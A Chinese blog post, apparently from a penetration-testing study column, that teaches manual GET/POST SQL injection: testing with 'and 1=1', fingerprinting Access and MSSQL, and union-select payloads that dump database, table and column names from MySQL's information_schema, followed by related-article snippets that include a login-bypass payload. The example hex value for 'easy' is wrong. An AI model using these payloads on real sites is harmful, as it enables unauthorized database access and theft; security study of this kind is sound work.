sql注入之GET/POST注入

最新推荐文章于 2025-03-31 23:32:31 发布
最新推荐文章于 2025-03-31 23:32:31 发布
阅读量1.3w 收藏 14
点赞数 4
分类专栏: 渗透学习 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38135094/article/details/68949289
版权

针对不同数据库,语句有所不同,但是思路大致相同

第一步判断网站是否存在注入,
如 www.xxx.com/news.php?id=10 这个网址,使用and 1=1,and 1=2 判断是否存在注入

还需要判断数据库类型,在网址后面加上单引号,看报错情况,如果显示Microsoft JET Database错误,则是Access数据库,如果显示ODBC类型,则是MSSQL数据库

另一种方法,如果已经判断该地址存在注入,在后面加上 ;–,例如 www.xxx.com/news.php?id=10;–,提交网址如果页面返回正常,则是MSSQL数据库,因为MSSQL数据库中, ;和–都是存在的,;用于分离两个语句,而–用于注释, 可是在ACCESS数据库中,;则被当成参数带入查询,所以会报错。

如果这两种方法都不成功,就利用两种数据库的差异判断

www.xxx.com/news.php?id=10 and (select count (*) from sysobjects)>0
www.xxx.com/news.php?id=10 and (select count (*) from msysobjects)>0

第一条语句如果返回正常,则说明是MSSQL数据库,这条语句是查询mssql数据库中表sysobject里的数据是否大于0,sysobject表是MSSQL、自带的表,所以这条查询语句正确,返回页面正常,这个表只有MSSQL数据库里才有,所以如果是ACCESS数据库就会报错,第二条语句同理,msyobjects表是ACCESS数据库独有的,但是注意就算是ACCESS数据库,也会返回错误,因为普通用户没有权限访问,注意如果该语句报错是说没有权限,那就是ACCESS数据库
总结就是,第一条语句返回正确,第二条语句返回错误,则是MSSQL数据库,两条语句都返回错误,而且错误类型不一样,则是ACCESS数据库。

判断数据库还有很多种方法,具体情况再考虑,还有很多不同的方法。

查询数据库表的数目

order by

爆字段位置

        and 1=2 union select 1,2,3.....n

利用内置函数暴数据库信息 

    version()   database()   user()

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息 

 and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from 
    information_schema.SCHEMATA limit 0,1

查数据库名:select database()

 Union select 1,database(),3,4,5

查到数据库名称 假设为easy。
查数据库名为easy下面的表名 ( 注意数据库名称要用 16进制编码 如果easy的十六进制编码为0x66616E6B65) 则查询语句为:

   union select 1,table_name,3,4,5 from information_schema.tables where    table_schema=0x66616E6B65x

information_schema.tables:存储mysql数据库下面的所有表名信息的表
table_schema: 数据库名
Table_name: 表名

查user表名下的列名信息:

union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x75736572

column_name:列名
information_schema.columns :存储mysql数据库下面的所有列名信息的表

手工注入还有很多语句,针对不同情况要考虑不同语句,有时候需要大量测试,如果针对可入住地址而且需要大量测试,工具可以帮忙。

SQL注入 - GET注入POST注入 一看就会
米兔-miny的博客
12-31 4134
本文章讲了SQL注入中的显错注入GET注入)和POST注入,一看就能学会。模仿里面的例子在靶场试试手,你就是下一个黑客帝王。
网络安全从入门到精通(第四章-2)GET&POST&HEAD注入
weixin_43643758的博客
03-29 561
本文内容: GET注入 POST注入 Head注入 sqlmap工具注入 get&post为显错注入: head为报错注入: 1,GET注入:   get注入属于显错注入。     1.判断注入点:       最古老的的方法是:         http://www.xxx.com/new.php?id=1 and 1=1 页面显示正常。         http:...
SQL注入---POST注入
zhoutong2323的博客
04-07 1646
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
SQL注入:基于GETPOST的报错注入详解
最新发布
si_feng_yi的博客
03-31 984
报错注入(Error-Based SQL Injection)是一种利用数据库错误信息来获取数据的SQL注入技术。当应用程序直接将数据库错误信息返回给用户时,攻击者可以构造特殊的SQL语句,使数据库执行时产生错误,并在错误信息中携带查询结果。如果返回包含MySQL版本号的错误信息,说明报错注入可行。使用参数化查询(Prepared Statements)最小权限原则,限制数据库用户权限。观察是否返回数据库错误信息。对输入进行严格的过滤和转义。观察是否返回数据库错误。
SqlGET注入
YIGAOYU的博客
04-09 1107
SqlGET注入
Sql注入-POST注入
purvispanwu的博客
12-19 2933
sql注入,网络安全
php中$_GET与$_POST过滤sql注入的方法
10-25
在本主题中,我们将关注如何使用addslashes_deep函数来过滤$_GET与$_POST数据以防止SQL注入。这个函数可以递归地对数组进行处理,对数组中的每个元素使用addslashes()函数进行转义。这是一个更加深入和全面的过滤...
【bWAPP】SQL注入实战
正是修行时
12-16 1588
我生来就是高山而非溪流 ,我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥,我站在伟人之肩藐视卑微的懦夫!
简学-SQL注入GET型与POST型)
码农米格的博客
02-14 3599
简学SQL注入0x01 SQL注入原理0x01.1 SQL注入发生的原因0x01.2 SQL注入会造成的危害0x02 GET注入漏洞。0x02.1 对网站进行 SQL注入测试时,首先需要我们找到注入点0x02.2 尝试`UNION`注入是否生效。0x02.3 测试字段的数量成功-通过回显结果替换其中的选项-获去数据库的详细信息0x02.4 成功获取数据库表-发现users表-进行users表结构信息获取0x02.5 根据回显结果替换字段,获取字段中的数据三级目录 0x01 SQL注入原理 什么是SQL
SQL注入--get注入
weixin_52151447的博客
11-11 2545
SQL注入--get注入 get为网页传参方式,常见的传参方式有GETPOST传参; GETPOST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
sql注入--POST注入
pakho_C的博客
01-04 4594
sql注入POST注入 靶场:sqli-labs-master 下载链接:靶场下载链接 POSTGET的区别 GET提交的数据会显示在URL中,POST则不会。这是最显而易见的差别。这点意味着GET更不安全(POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST会再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都会创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
SQL注入--POST注入
weixin_52151447的博客
11-19 3778
post注入get注入区别在于POST注入在传参时不会将
sql注入post注入
forwardss的博客
03-05 543
http://192.168.186.157/sqli-labs/Less-11/ 1、判断是否能够注入 uname=admin’# &passwd=&submit=Submit 2、.判断所在的数据库有几列 uname=admin’ order by 2#&passwd=&submit=Submit 3、显示位数 uname=1 admin’ union sel...
SQL注入GET
qq_51393133的博客
09-11 1549
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
SQL注入漏洞-GET注入
HacHunter的博客
03-05 3085
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
SQL注入——GET类型
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-03 3169
SQL注入——GET类型 靶场地址 原理: sql注入就是利用GET传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息 第一题: 我们先在url栏测试一下,把id=1改成id=-1 结果页面就不显示了 表示存在sql注入漏洞我们再查看一下源码,发现它是自动闭合的,不需要我们输入代码闭合 接着,我在url轮流输入 order by 1,2,3.... 测试出它页面字段总数 在输入...
GETPOST的区别
weixin_30645617的博客
08-28 163
1.GET把参数包含在URL中,POST通过request body传递参数。 2.GET在浏览器回退时是无害的,而POST会再次提交请求。 3.GET产生的URL地址可以被Bookmark,而POST不可以。 4.GET请求会被浏览器主动cache,而POST不会,除非手动设置。 5.GET请求只能进行url编码,而POST支持多种编码方式。 6.GET...
SQL注入——POST注入 HEAD注入
weixin_41487522的博客
04-10 784
SQL注入——POST注入 HEAD注入 POST注入介绍 POST注入属于注入的一种,相信大家都知道POSTGET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型没什么区别。POST一般而言不会进行URL编码,但是GET会。 POST注入高危点: 登录框 查询框 各种与数据库有交互的框 最经典的POST注入莫过于万能密码: ’ or 1=1# 万能密码原理: se...
13、注入篇-- POST注入
WX公众号-小白学安全
04-05 1570
文章目录原理利用防范靶场 原理 利用 防范 靶场
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值